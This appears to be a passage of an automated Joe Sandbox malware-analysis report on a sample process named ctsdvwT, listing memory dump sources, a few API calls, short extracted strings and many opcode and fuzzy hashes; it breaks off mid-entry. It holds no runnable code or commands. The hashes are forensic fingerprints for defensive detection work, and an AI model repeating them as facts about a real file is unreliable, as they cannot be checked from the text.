                                            • OleInitialize.OLE32(00000000), ref: 0639E1E5
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4146687096.0000000006390000.00000040.00000800.00020000.00000000.sdmp, Offset: 06390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_6390000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: Initialize
                                            • String ID:
                                            • API String ID: 2538663250-0
                                            APIs
                                            • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,0639D89D), ref: 0639D927
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4146687096.0000000006390000.00000040.00000800.00020000.00000000.sdmp, Offset: 06390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_6390000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: CallbackDispatcherUser
                                            • String ID:
                                            • API String ID: 2492992576-0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4138936539.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1390000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: \V|l
                                            • API String ID: 0-253765261
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4138936539.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1390000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: PH^q
                                            • API String ID: 0-2549759414
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4138936539.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1390000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: PH^q
                                            • API String ID: 0-2549759414
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4138936539.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1390000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LR^q
                                            • API String ID: 0-2625958711
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4138936539.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1390000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LR^q
                                            • API String ID: 0-2625958711
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4138936539.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1390000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LR^q
                                            • API String ID: 0-2625958711
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4138936539.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1390000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4138936539.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1390000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2d4460dac9d1398285aa82a9332f659c98dc1ef1fd8a191beabf41bf45dfcd19
                                            • Instruction ID: fb72eed6d1f6156ddcd8e2248b7fb25cb8af9b3ab3b9754b77c15751d5607bb4
                                            • Opcode Fuzzy Hash: 2d4460dac9d1398285aa82a9332f659c98dc1ef1fd8a191beabf41bf45dfcd19
                                            • Instruction Fuzzy Hash: 93B1503070010A9FCF25A72CD49462973A2FB96258B508E39D406CB799DF39EC86CB91
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4138936539.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1390000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 94abe924ef9b750b2ce7ad3985ef8f1d2fd6abdf577c08397ad580c7812fa70e
                                            • Instruction ID: 1f447e00f27b713fa6b3deffe8c4400b32d82e89fcca933bc697d2c4b1e8d37a
                                            • Opcode Fuzzy Hash: 94abe924ef9b750b2ce7ad3985ef8f1d2fd6abdf577c08397ad580c7812fa70e
                                            • Instruction Fuzzy Hash: FCB15A70E1024A9FDF10CFA8DA857DDBBF1AF48318F148529D859E7294EB749886CF81
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4138936539.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1390000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b5ef5b54d210af7977f44020703f154e0c352ece76712cf08859687b2799f6a8
                                            • Instruction ID: eb20b37a032c77b95199fa8aa9f9d49a09c3c2d62e373b0fe15fee7dff920b95
                                            • Opcode Fuzzy Hash: b5ef5b54d210af7977f44020703f154e0c352ece76712cf08859687b2799f6a8
                                            • Instruction Fuzzy Hash: F5919D74A002099FDF15DBA8D988AADBBF2FF88318F148569E506E7355DB31DC42CB90
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4138936539.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1390000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e232be21bf01a63c2dbaeea8aa3accddbf9369e90ae6f5f8bce28d8aecae5460
                                            • Instruction ID: 523bc204a6fe01f344a4d97b7b24dd78ac6c0d99ee9a325d250ee479e426f17e
                                            • Opcode Fuzzy Hash: e232be21bf01a63c2dbaeea8aa3accddbf9369e90ae6f5f8bce28d8aecae5460
                                            • Instruction Fuzzy Hash: 53714971A00205CFDB14DFA9D984B9EBBB6FF88318F14C169E909AB395DB71D844CB90
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4138936539.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1390000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ec2a216ee25ba0788af91dceda9310208e99831c4344ea2efd4fe3ed014e11f3
                                            • Instruction ID: a30edeaa6b651f0f5461c7eee0ecf05bae63d9312b3546c5a9d5331211b57103
                                            • Opcode Fuzzy Hash: ec2a216ee25ba0788af91dceda9310208e99831c4344ea2efd4fe3ed014e11f3
                                            • Instruction Fuzzy Hash: F55113B0D012188FDF18CFA9C985B9DBBB5BF48318F14812EE819AB351D774A845CF95
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4138936539.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1390000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 146f892c2e042e5a9eacdfee948f41728bf0cdbba9b2ba603afbb668543a8161
                                            • Instruction ID: f3672153f9b381391eb43eaa626a223c4ff1be10d6f4b804a6bd2c7c34f71019
                                            • Opcode Fuzzy Hash: 146f892c2e042e5a9eacdfee948f41728bf0cdbba9b2ba603afbb668543a8161
                                            • Instruction Fuzzy Hash: F55123B0D012188FDF18CFA9C985B9DBBB1BF48318F14812EE819AB355D774A844CF95
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4138936539.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1390000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9039f18ac942d6f34b652169ad5d1c5f6656d9eceae19fefeaa678581eeb06a8
                                            • Instruction ID: e24430ae73fdd82926c328c7ef6209798a2b21145986ddb484be97e8620dd898
                                            • Opcode Fuzzy Hash: 9039f18ac942d6f34b652169ad5d1c5f6656d9eceae19fefeaa678581eeb06a8
                                            • Instruction Fuzzy Hash: 0651E57120124ADFC766EB68F9A1D547BB5FBB1304B448979D0048B33EDB346D49CB94
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4138936539.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1390000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b749ad8902fddf3f785177ec5b43668233e2cff4eb3868a7ec44f4a8b875f3f2
                                            • Instruction ID: 67c5192165b5f88dd7c39fff4924a3e2fe2c40add7eb801a722149f69ebffd35
                                            • Opcode Fuzzy Hash: b749ad8902fddf3f785177ec5b43668233e2cff4eb3868a7ec44f4a8b875f3f2
                                            • Instruction Fuzzy Hash: 4C51E57120214ADFC766EB68F9A1D587BB6FBB2304B448979D0048B33EDB306D49CB94
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4138936539.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1390000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a8bba943e38732ad3d429a450695bf4df8d17dd491e2e980343457b918fd94d4
                                            • Instruction ID: ac9784f8dcd18d79cd1c875224e73e592044c525a23621b273d3388bb3ece8f4
                                            • Opcode Fuzzy Hash: a8bba943e38732ad3d429a450695bf4df8d17dd491e2e980343457b918fd94d4
                                            • Instruction Fuzzy Hash: C24101B1D003499FDB10CFA9C484ADEBFF5EF48314F248029E819AB254DB759986CF90
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4138936539.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1390000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 40a49d20323a97287138850aead1757cdb44c22a3250f8c1383e00358ab56955
                                            • Instruction ID: e2ea4736262a2a37124d92fd799f0750b8eb9eaa31b9d23da84124cae3301177
                                            • Opcode Fuzzy Hash: 40a49d20323a97287138850aead1757cdb44c22a3250f8c1383e00358ab56955
                                            • Instruction Fuzzy Hash: C5316375E006069BCF15DFA9D49479EB7B2FF89304F148929E81AE7341DB70AC42CB90
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4138936539.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1390000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 47206ef7218ae72cb6f9728d0ece3d9c083efe83561eaeb6c5e0bb971fbdf82d
                                            • Instruction ID: 6fe66434c6dea5aa9b6f0086d298463c963d26d972d1188aa9d50e42a4aea0d5
                                            • Opcode Fuzzy Hash: 47206ef7218ae72cb6f9728d0ece3d9c083efe83561eaeb6c5e0bb971fbdf82d
                                            • Instruction Fuzzy Hash: 85316034E006069BCF15DFA9D49469EB7B2FF89304F148929E81AE7341DB70AC42CB90
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4138936539.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1390000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7191e5d1c8479d7fad7b90e64b03957868ec4195c156397cb6b5cefa9c60e352
                                            • Instruction ID: bfdc9977fe87c7024cc3e3e09690d80ce262ce71a5eb16561a3eead4d0360870
                                            • Opcode Fuzzy Hash: 7191e5d1c8479d7fad7b90e64b03957868ec4195c156397cb6b5cefa9c60e352
                                            • Instruction Fuzzy Hash: B241EEB0D00349AFDB14DFA9C584ADEBFB5EF48314F108029E819AB254DB75A989CB90
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4138936539.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1390000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d8d4bc61d4334c22e676845d234b4866eb0b0c5db39113dedeb0f38c40a2f6f0
                                            • Instruction ID: aa8a74bc2af032d8bdf292f5ebb8414f78aacc1fdf95c5c7d16f5439d1d4b4ca
                                            • Opcode Fuzzy Hash: d8d4bc61d4334c22e676845d234b4866eb0b0c5db39113dedeb0f38c40a2f6f0
                                            • Instruction Fuzzy Hash: 1B316171E1020E9BDF19DFA8D89469EF7B2FF8A304F148559E409EB341DB709846CB90
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4138936539.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1390000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f9bc2862ab516c6a27954cb0e677279dc61547efe50492d28ba4c882378ae2f0
                                            • Instruction ID: 73da8b3d7c202f2b5e6a41c9787d24c2b59aec53fc651bc9e9ecbf74a7039447
                                            • Opcode Fuzzy Hash: f9bc2862ab516c6a27954cb0e677279dc61547efe50492d28ba4c882378ae2f0
                                            • Instruction Fuzzy Hash: 4C216271E1020E9BDF15DFA9D89469EF7B2FF8A304F148659E405EB341DB709846CB90
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4138936539.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1390000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: bd93fcd84e5cfaca235a2caa67145eac5686d14e67d6076ac7436b7b6a488d91
                                            • Instruction ID: abd97f7ce9778a9e622f2b907b4c31f1eda1bc9c17a2b2c60d987e4b5f88df4d
                                            • Opcode Fuzzy Hash: bd93fcd84e5cfaca235a2caa67145eac5686d14e67d6076ac7436b7b6a488d91
                                            • Instruction Fuzzy Hash: 8F21B0B4A001079FDF22E72CE8A5B5E7756EB51368F104D26D40AC735EE738D8858BD2
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4138936539.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1390000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0c0cacac5254900d4948e8b42dc1b2fcf6f6730ec5662765605301ac7853a661
                                            • Instruction ID: cd27020f7c1d9a21bce8669ea51a55023f5687782e126083ecd243585aedbe33
                                            • Opcode Fuzzy Hash: 0c0cacac5254900d4948e8b42dc1b2fcf6f6730ec5662765605301ac7853a661
                                            • Instruction Fuzzy Hash: 2C21A274A401068FEF32666CD8C432DB735F7463B9F100C6AE50BE7389DA28D8948795
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4138936539.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1390000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c4925d45326ec3dc0038286c38d4b592d77f693052768e54b5e44559a40e8f63
                                            • Instruction ID: b9df7b682187c8447ae1a584ad7e85573a14bea24b8c84ec7e59916526448773
                                            • Opcode Fuzzy Hash: c4925d45326ec3dc0038286c38d4b592d77f693052768e54b5e44559a40e8f63
                                            • Instruction Fuzzy Hash: B9217131E0020A9BDF19CFA8C4945DEF7B6AF8A308F24865AE815F7741DB709846CB51
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4138936539.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1390000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 190d614e1a1ab56f223627fb8406e3bba81ed0c89f064172bca6eb0de105d9d2
                                            • Instruction ID: 37b403e238b6041e08b21e0293955525aec3ab1602c695641e2aea207e78a1e7
                                            • Opcode Fuzzy Hash: 190d614e1a1ab56f223627fb8406e3bba81ed0c89f064172bca6eb0de105d9d2
                                            • Instruction Fuzzy Hash: 41213B34700209CFDB64EF78D558A9D7BF5AF49348F104469E506EB364DB32AD40CB90
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4138279010.000000000133D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0133D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_133d000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f0138f3b46d11c4a3377743f1c87bf6b4599671b1109656db98025e0da4b4cb1
                                            • Instruction ID: 8e79623eba891b7e394f7cf88e156b51aa5882292475c47046b0a43dba2b7369
                                            • Opcode Fuzzy Hash: f0138f3b46d11c4a3377743f1c87bf6b4599671b1109656db98025e0da4b4cb1
                                            • Instruction Fuzzy Hash: A3213070604204DFCB11DF68D980B26FBA5FB84B18F60C569E80A4B256C33AC446CA61
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4138936539.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1390000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 15aaee3b061e93cc70bc9e1aed510d4d5893c2a7eaea8f2c846ffb1a29657a94
                                            • Instruction ID: 8f0d297dad4495ada88ed1d9966aa53601e74445c46d303735308afee53275a9
                                            • Opcode Fuzzy Hash: 15aaee3b061e93cc70bc9e1aed510d4d5893c2a7eaea8f2c846ffb1a29657a94
                                            • Instruction Fuzzy Hash: E8215B71B10215DFEB14DBADC954BAE7BFAAF88718F108069E505EB3A4DA71DC008B90
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4138936539.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1390000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 76041b59ab49f2a277507c2f655c94d589882cf61c9c7a2e6731f5f0758c0f5d
                                            • Instruction ID: b1a53d58356cc15cdba0b92ace36e01b4dfdc0e2a5bb67b916a77cf40665d475
                                            • Opcode Fuzzy Hash: 76041b59ab49f2a277507c2f655c94d589882cf61c9c7a2e6731f5f0758c0f5d
                                            • Instruction Fuzzy Hash: 42213C30B0020ACFDF64EB68C5156AE77F6AB89259F100478D505FB364DB36DD40CBA1
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4138936539.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1390000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0b841e229816b16ba3250bf816b04507ab1c3e5cbd73ce8b684522d828c89034
                                            • Instruction ID: a27ecd7b9e6818995a3b931a21bb3fbefcd7049e9ebbc9b4995e482de6e1eff1
                                            • Opcode Fuzzy Hash: 0b841e229816b16ba3250bf816b04507ab1c3e5cbd73ce8b684522d828c89034
                                            • Instruction Fuzzy Hash: 2A216231E0020E9BDF19CFA8C4545DEF7B6AF8A304F24855AE815F7340DB70A845CB91
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4138936539.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1390000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8b5cd51a4e2760639e5f9094f5a4a8af4880e3c8438947b2e25dfa894f51809f
                                            • Instruction ID: 0cca461050c701b9644518347f92cd1ccdf1f6cd7a48fbb598cb2a04f571891f
                                            • Opcode Fuzzy Hash: 8b5cd51a4e2760639e5f9094f5a4a8af4880e3c8438947b2e25dfa894f51809f
                                            • Instruction Fuzzy Hash: 3721607864010B9FDF22E72CE8A575E7756EB55368F104D22D00EC736EEB38D8858B92
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4138936539.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1390000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5fdc7188806260089a0e6e3944a37ff63988c7de351649dee8871bba2deff265
                                            • Instruction ID: 33539688c30f79fb01c89d2a36575051bbfed2f1b171b3276e36adfa86df40f7
                                            • Opcode Fuzzy Hash: 5fdc7188806260089a0e6e3944a37ff63988c7de351649dee8871bba2deff265
                                            • Instruction Fuzzy Hash: 5C215930B0020ACFDF64EB68C5556AE77F5AF89258F100878D105FB3A4DB329D00CBA1
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4138936539.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1390000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a250cfc1e89314af4faed9f71272f6d292206e00d825a8f9070166dfaeafd4c8
                                            • Instruction ID: f3952f41229c3ffc1bc14d347f709ec070872e93e6c00b3f94368b5c21a0d297
                                            • Opcode Fuzzy Hash: a250cfc1e89314af4faed9f71272f6d292206e00d825a8f9070166dfaeafd4c8
                                            • Instruction Fuzzy Hash: 4C213934700209CFDB68EB78C558AAD7BF5AF49308F1044A9E506EB3A4DB32AD41CB90
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4138279010.000000000133D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0133D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_133d000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: beab6543dc73b4be326283cd59cb534281c5d8f532dceed4d6695b83762cc6a3
                                            • Instruction ID: 4919f45769813ed1bcba44b682825ea4165a7a91937a41b9f43e935a09243363
                                            • Opcode Fuzzy Hash: beab6543dc73b4be326283cd59cb534281c5d8f532dceed4d6695b83762cc6a3
                                            • Instruction Fuzzy Hash: FD2153755083809FDB02CF64D994711BF71EB86618F24C5DAD8498F2A7C33A9856CB62
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4138936539.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                            Joe Sandbox IDA Plugin